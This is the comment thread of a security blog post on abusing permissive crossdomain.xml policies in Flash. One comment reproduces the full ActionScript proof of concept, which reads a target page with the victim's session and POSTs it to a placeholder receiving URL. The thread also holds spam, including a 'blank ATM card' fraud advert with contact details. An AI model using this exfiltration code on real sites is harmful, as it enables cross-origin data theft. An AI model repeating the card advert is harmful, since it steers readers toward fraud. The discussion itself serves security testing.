tag:blogger.com,1999:blog-4663432300421783651.post3938047007409765368..comments2024-02-15T00:21:56.515-08:00Comments on Random Security: Exploiting Insecure crossdomain.xml to Bypass Same Origin Policy (ActionScript PoC)Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-4663432300421783651.post-65336269084672693882020-11-18T18:59:22.105-08:002020-11-18T18:59:22.105-08:00I am a Single full time dad on disability getting ...I am a Single full time dad on disability getting no help from their moms. It a struggle every day. My boys are 15 and 9 been doing this by myself for 8 years now it’s completely drained all my savings everything . These guys are the present day ROBIN HOOD. Im back on my feet again and my kids can have a better life all thanks to the blank card i acquired from skylink technology. Now i can withdraw up too 3000 per day Contact them as well on Mail: skylinktechnes@yahoo.com or whatsspp/telegram: +1(213)785-1553siqing chenhttps://www.blogger.com/profile/06027038058578968132noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-20358751075868610402020-03-09T21:57:28.219-07:002020-03-09T21:57:28.219-07:00Thanks for sharing, nice post! Post really provice...Thanks for sharing, nice post! Post really provice useful information!<br /><br />An Thái Sơn chia sẻ <a href="http://www.google.com.sv/url?q=http://anthaison.vn/be-nam-noi-dien-vong-dien-co-anh-huong-gi-khong/" rel="nofollow">trẻ sơ sinh nằm nôi điện có tốt không</a> hay <a href="http://www.google.com.sv/url?q=http://anthaison.vn/vong-dien-cho-be/" rel="nofollow">võng điện</a> có tốt không và giải đáp <a href="http://www.google.com.sv/url?q=http://anthaison.vn/may-dua-vong-tu-dong-ts-cho-em-be-gia-bao-nhieu-mua-o-dau-tot/" rel="nofollow">cục điện đưa võng giá bao nhiêu</a> cũng như <a href="http://www.google.com.sv/url?q=http://anthaison.vn/mua-may-dua-vong-o-tphcm/" rel="nofollow">mua máy đưa võng ở tphcm</a> địa chỉ ở đâu uy tín.thulannguyenhttps://www.blogger.com/profile/12739173686013878533noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-71417076709665265592019-05-14T21:38:54.089-07:002019-05-14T21:38:54.089-07:00very specific nice content. This article is very m...very specific nice content. This article is very much helpful and i hope this will be an useful information for the needed one.Keep on updating these kinds of informative things<br>I likable the posts and offbeat format you've got here! I’d wish many thanks for sharing your expertise and also the time it took to post!!<br><br>Best Website For TV Series & Movies Free Download & Games <br><br /><a href="https://ktmtvshow.com/the-flash-season-1-full-hd-download/" rel="nofollow">The Flash Season 1 </a> <br><br /><a href="https://ktmtvshow.com/the-flash-season-2-full-hd-download-all-episodes/" rel="nofollow">The Flash Season 2 Full </a> <br><br /><a href="https://ktmtvshow.com/the-flash-season-5-full-hd-download-all-episodes/" rel="nofollow">The Flash Season 5 Full </a> <br><br /><a href="https://ktmtvshow.com/daringbaaz-lootere-2019-hindi-dubbed-720p-new-full-movie/" rel="nofollow">Daringbaaz Lootere 2019 Full Movies </a> <br><br /><a href="https://ktmtvshow.com/brooklyn-nine-nine-season-4-all-episodes-download-full-hd/" rel="nofollow">Brooklyn Nine-Nine </a> <br>Shahnawazhttps://www.blogger.com/profile/08497777524489535810noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-32815060287984836152015-11-12T07:23:52.908-08:002015-11-12T07:23:52.908-08:00Great write-up. It's all too easy to miss stuf...Great write-up. It's all too easy to miss stuff like this when developing a site, but the recent Ashley Madison hack shows how easily this can be leveraged to exfiltrate data!Adam Davieshttps://abeontech.com/noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-45434369023152277002015-06-07T11:31:04.282-07:002015-06-07T11:31:04.282-07:00This comment has been removed by the author.anonymoushttps://www.blogger.com/profile/11231635491642039610noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-48918321257768486322014-06-16T10:02:08.667-07:002014-06-16T10:02:08.667-07:00Great. Good to know that.Great. Good to know that.Gursev Singh Kalrahttps://www.blogger.com/profile/11125392470187170013noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-6941262034760161942014-06-16T05:21:03.570-07:002014-06-16T05:21:03.570-07:00Thanks Gursev. It workedThanks Gursev. It workedbugasurhttps://www.blogger.com/profile/12880251325009483213noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-86814520653928008852014-06-12T13:07:58.741-07:002014-06-12T13:07:58.741-07:00This comment has been removed by the author.bugasurhttps://www.blogger.com/profile/12880251325009483213noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-22261829502881706512013-12-16T06:24:47.072-08:002013-12-16T06:24:47.072-08:00You will agree that the risk is aggravated if the ...You will agree that the risk is aggravated if the accessed page is available only to authenticated users. However, pre-auth pages can be accessed directly by anyone, so no information disclosure risk there.Gursev Singh Kalrahttps://www.blogger.com/profile/11125392470187170013noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-58248092306775576312013-12-16T06:04:25.820-08:002013-12-16T06:04:25.820-08:00I think I may have answered my own question. when ...I think I may have answered my own question. when I load victim url and the malicious html file, I do get a <br /><br />304 HTTPS www.targetURL.org /crossdomain.xml<br /><br />GET /crossdomain.xml<br /><br />in fiddler, with cookies, specifically a sfsession= (....) cookie. which is in line with your description on how this flash file works. however, this url is an unauthenticated page. so I do believe this vuln is not necessarily high risk. your thoughts?? Thank you for your timeAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-19461885756112971282013-12-16T05:23:19.906-08:002013-12-16T05:23:19.906-08:00// Author: Gursev Singh Kalra (gursev.kalra@founds...// Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)<br />// XDomainXploit.as<br />// Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5<br />package {<br /> import flash.display.Sprite;<br /> import flash.events.*;<br /> import flash.net.URLRequestMethod;<br /> import flash.net.URLRequest;<br /> import flash.net.URLLoader;<br /><br /><br /> public class XDomainXploit extends Sprite {<br /> public function XDomainXploit() {<br /> // Target URL from where the data is to be retrieved<br /> var readFrom:String = "TEST URL";<br /> var readRequest:URLRequest = new URLRequest(readFrom);<br /> var getLoader:URLLoader = new URLLoader();<br /> getLoader.addEventListener(Event.COMPLETE, eventHandler);<br /> try {<br /> getLoader.load(readRequest);<br /> } catch (error:Error) {<br /> trace("Error loading URL: " + error);<br /> }<br /> }<br /><br /><br /> private function eventHandler(event:Event):void {<br /> // URL to which retrieved data is to be sent<br /> var sendTo:String = "RECIEVING URL"<br /> var sendRequest:URLRequest = new URLRequest(sendTo);<br /> sendRequest.method = URLRequestMethod.POST;<br /> sendRequest.data = event.target.data;<br /> var sendLoader:URLLoader = new URLLoader();<br /> try {<br /> sendLoader.load(sendRequest);<br /> } catch (error:Error) {<br /> trace("Error loading URL: " + error);<br /> }<br /> }<br /> }<br />}<br /><br /><br /><br />this is the XDomainXploit.as file I use, I then compile with the mxmlc in cmd prompt. I get a .swf file. I copied and pasted the html file into notepad, saved as a .html. load both the victim url and the html file in Internet Explorer, and while in fiddler, or any proxy I see no data similar to your screen shotAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-32087711302165867392013-12-13T12:59:04.088-08:002013-12-13T12:59:04.088-08:00@Anonymous if you can share your test configuratio...@Anonymous if you can share your test configuration, maybe i can try to helpGursev Singh Kalrahttps://www.blogger.com/profile/11125392470187170013noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-88748685455925647502013-12-13T12:57:37.401-08:002013-12-13T12:57:37.401-08:00I don't think the URL should be an an issue, a...I don't think the URL should be an an issue, as long as it can be parsed.Gursev Singh Kalrahttps://www.blogger.com/profile/11125392470187170013noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-60875646698295501392013-12-13T11:50:19.475-08:002013-12-13T11:50:19.475-08:00I am kind of lost after deploying the file, I laun...I am kind of lost after deploying the file, I launch the html file, which references the .swf file which has my target url. Does it matter which URL i put in the "SendTo:String= quotes? <br />I assume once i have the target url and the malicous html both loaded, i will see the data within what looks like fiddler, in your example? however i am seeing no data. Any advice would be appreciated! Thanks!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-31671361521189332522013-09-16T09:34:11.724-07:002013-09-16T09:34:11.724-07:00Cool! Glad it was helpful.
GursevCool! Glad it was helpful.<br /><br />GursevGursev Singh Kalrahttps://www.blogger.com/profile/11125392470187170013noreply@blogger.comtag:blogger.com,1999:blog-4663432300421783651.post-14868483669857685502013-09-12T13:52:36.001-07:002013-09-12T13:52:36.001-07:00Very nice article.
The attack, also the ActionScr...Very nice article.<br /><br />The attack, also the ActionScript code, is integrated in bWAPP (a buggy web application).<br /><br />More info: www.itsecgames.com<br /><br />Thanks Gursev!<br /><br />RegardsMalik Mesellemhttp://www.itsecgames.comnoreply@blogger.com